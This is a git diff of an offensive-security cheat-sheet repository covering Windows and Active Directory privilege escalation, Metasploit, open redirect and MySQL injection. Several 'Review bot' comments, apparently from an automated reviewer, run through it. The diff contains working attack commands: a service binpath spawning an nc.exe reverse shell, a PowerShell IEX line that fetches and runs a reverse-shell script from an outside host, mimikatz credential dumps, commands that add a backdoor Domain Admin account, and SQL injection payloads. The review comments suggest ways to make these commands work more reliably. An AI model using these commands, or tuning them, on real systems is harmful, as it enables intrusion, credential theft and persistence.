diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index e3bfa53..d047367 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -22,11 +22,6 @@ * [Trust relationship between domains](#trust-relationship-between-domains) * [PrivExchange attack](#privexchange-attack) * [Password spraying](#password-spraying) -* [Privilege Escalation](#privilege-escalation) - * [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato) - * [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) - * [PrivEsc Local Admin - MS17-010 (Eternal Blue)](#privesc-local-admin---ms17-010-eternal-blue) - * [From Local Admin to Domain Admin](#from-local-admin-to-domain-admin) ## Tools @@ -56,6 +51,7 @@ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec crackmapexec smb -L crackmapexec smb -M name_module -o VAR=DATA + crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 
@@ -598,56 +594,6 @@ Most of the time the best passwords to spray are : - $Companyname1 -## Privilege Escalation - -### PrivEsc Local Admin - Token Impersonation (RottenPotato) - -Binary available at : https://github.com/foxglovesec/RottenPotato -Binary available at : https://github.com/breenmachine/RottenPotatoNG - -```c -getuid -getprivs -use incognito -list\_tokens -u -cd c:\temp\ -execute -Hc -f ./rot.exe -impersonate\_token "NT AUTHORITY\SYSTEM" -``` - -```powershell -Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" -Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" -Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" -``` - -### PrivEsc Local Admin - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - -Check if the patch is installed : `wmic qfe list | find "3139914"` - -```powershell -Powershell: -https://www.exploit-db.com/exploits/39719/ -https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 - -Binary exe : https://github.com/Meatballs1/ms16-032 - -Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc -``` - -### PrivEsc Local Admin - MS17-010 (Eternal Blue) - -```c -nmap -Pn -p445 — open — max-hostgroup 3 — script smb-vuln-ms17–010 -``` - -### From Local Admin to Domain Admin - -```powershell -net user hacker2 hacker123 /add /Domain -net group "Domain Admins" hacker2 /add /domain -``` - ## References * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 828e58e..bcf6af3 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md 
+++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -242,6 +242,14 @@ sudo chmod +s /tmp/suid # setuid bit ### Interesting capabilities +Having the capability =ep means the binary has all the capabilities. +```powershell +$ getcap openssl /usr/bin/openssl +openssl=ep +``` + +Alternatively the following capabilities can be used in order to upgrade your current privileges. + ```powershell cap_dac_read_search # read anything cap_setuid+ep # setuid diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 76e6bcd..c7b9980 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -153,7 +153,9 @@ execute -H -i -c -m -d calc.exe -f /root/wce.exe -a -w load mimikatz mimikatz_command -f version mimikatz_command -f samdump::hashes +mimikatz_command -f sekurlsa::wdigest mimikatz_command -f sekurlsa::searchPasswords +mimikatz_command -f sekurlsa::logonPasswords full ``` ```powershell diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index eb43f9e..3975ad9 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -15,6 +15,10 @@ * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Runas](#eop---runas) +* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures) + * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato) + * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) + * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) ## Tools 
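Review bot: The new `$ getcap openssl /usr/bin/openssl` example in the Interesting capabilities hunk passes a relative path that only resolves if the shell is already in the directory holding the binary, so copied verbatim it prints a lookup error (or nothing) for `openssl` and the shown `openssl=ep` output does not reproduce. I would use the absolute path alone, `$ getcap /usr/bin/openssl`, and put the enumeration command readers need first above it, `getcap -r / 2>/dev/null`. The sentence introducing it could also be sharper: `=ep` is libcap's empty-capability-list shorthand meaning every capability is in the Effective and Permitted sets, which makes such a binary effectively root-equivalent rather than merely interesting.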
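Review bot: The two `mimikatz_command` lines added to the Metasploit cheatsheet drive the legacy `mimikatz` Meterpreter extension, which wraps the 1.x codebase and has, as far as I recall, been superseded by `kiwi` with a deprecation notice on load. I would add one comment above the block, `# legacy extension - prefer: load kiwi; creds_all; kiwi_cmd sekurlsa::logonpasswords`, so readers on current Windows builds do not troubleshoot empty or stale output from the old parsers.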
@@ -421,9 +425,12 @@ You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify ### Example with Windows XP SP1 ```powershell -$ sc config upnphost binpath="C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe" -sc config upnphost obj=".\LocalSystem" password="" +# NOTE: spaces are mandatory for this exploit to work ! +sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe" +sc config upnphost obj= ".\LocalSystem" password= "" sc qc upnphost +sc config upnphost depend= "" +net start upnphost ``` If it fails because of a missing dependency, try the following commands. 
@@ -586,6 +593,52 @@ $ computer = "" ``` +## EoP - Common Vulnerabilities and Exposure + +### Token Impersonation (RottenPotato) + +Binary available at : https://github.com/foxglovesec/RottenPotato +Binary available at : https://github.com/breenmachine/RottenPotatoNG + +```c +getuid +getprivs +use incognito +list\_tokens -u +cd c:\temp\ +execute -Hc -f ./rot.exe +impersonate\_token "NT AUTHORITY\SYSTEM" +``` + +```powershell +Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser" +Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM" +Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};" +``` + +### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) + +Check if the patch is installed : `wmic qfe list | find "3139914"` + +```powershell +Powershell: +https://www.exploit-db.com/exploits/39719/ +https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1 + +Binary exe : https://github.com/Meatballs1/ms16-032 + +Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc +``` + +### MS17-010 (Eternal Blue) + +```c +nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 +``` + + + + ## References diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index a2d0ed3..1d32e8c 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -3,9 +3,10 @@ ## TIP 1 - Create your credential :D ```powershell -net user hacker hacker /add +net user hacker hacker1234* /add net localgroup administrators hacker /add -net group "Domain Admins" hacker /ADD /DOMAIN +net localgroup "Remote Desktop Users" hacker /add +net group "Domain Admins" hacker /add /domain ``` Some info about your user 
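Review bot: The new heading `## EoP - Common Vulnerabilities and Exposure` does not match the table-of-contents entry added earlier in this diff, which links to `#eop---common-vulnerabilities-and-exposures` (plural); GitHub derives anchors from the heading text, so that link is dead, and `## EoP - Common Vulnerabilities and Exposures` fixes it. Separately, the MS17-010 nmap line still carries a typographic en dash in `smb-vuln-ms17–010` even though the `--open`, `--max-hostgroup` and `--script` flags were repaired; nmap will not resolve that script name, so it should read `--script smb-vuln-ms17-010` with an ASCII hyphen. The `wmic qfe list | find "3139914"` check is also, I believe, only one of the MS16-032 KBs (Windows 10 received the fix in cumulative updates), so a short caveat that its absence is indicative rather than conclusive would help.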
diff --git a/Open Redirect/README.md b/Open Redirect/README.md index 80556da..0584673 100644 --- a/Open Redirect/README.md +++ b/Open Redirect/README.md @@ -165,6 +165,7 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) ## References * filedescriptor +* [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781) * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet) * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index b5e5ee1..5a63dd5 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -19,6 +19,7 @@ * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) +* [MYSQL Current queries](#mysql-current-queries) * [MYSQL Read content of a file](#mysql-read-content-of-a-file) * [MYSQL Write a shell](#mysql-write-a-shell) * [MYSQL UDF command execution](#mysql-udf-command-execution) 
@@ -223,6 +224,17 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# ``` +## MYSQL Current queries + +This table can list all operations that DB is performing at the moment. + +```sql +union SELECT 1,state,info,4 FROM INFORMATION_SCHEMA.PROCESSLIST # + +-- Dump in one shot example for the table content. +union select 1,(select(@)from(select(@:=0x00),(select(@)from(information_schema.processlist)where(@)in(@:=concat(@,0x3C62723E,state,0x3a,info))))a),3,4 # +``` + ## MYSQL Read content of a file Need the `filepriv`, otherwise you will get the error : `ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement` @@ -305,4 +317,5 @@ load data infile '\\\\error\\abc' into table database.table_name; - [Help по MySql инъекциям - rdot.org](https://rdot.org/forum/showpost.php?p=114&postcount=1) - [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/) - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123) -- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) \ No newline at end of file +- [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) +- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) \ No newline at end of file
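Review bot: The sentence `This table can list all operations that DB is performing at the moment.` in the new Current queries section overstates what the injected account will see: `INFORMATION_SCHEMA.PROCESSLIST` exposes other sessions' threads only when the account holds the PROCESS privilege, otherwise it returns just the attacker's own connection, whose `info` column is the injected query itself. I would qualify it as `Requires the PROCESS privilege to see other users' threads; without it only your own session is listed.` and note that a multi-row result is therefore also a quick privilege check. The DIOS variant below inherits the same limit.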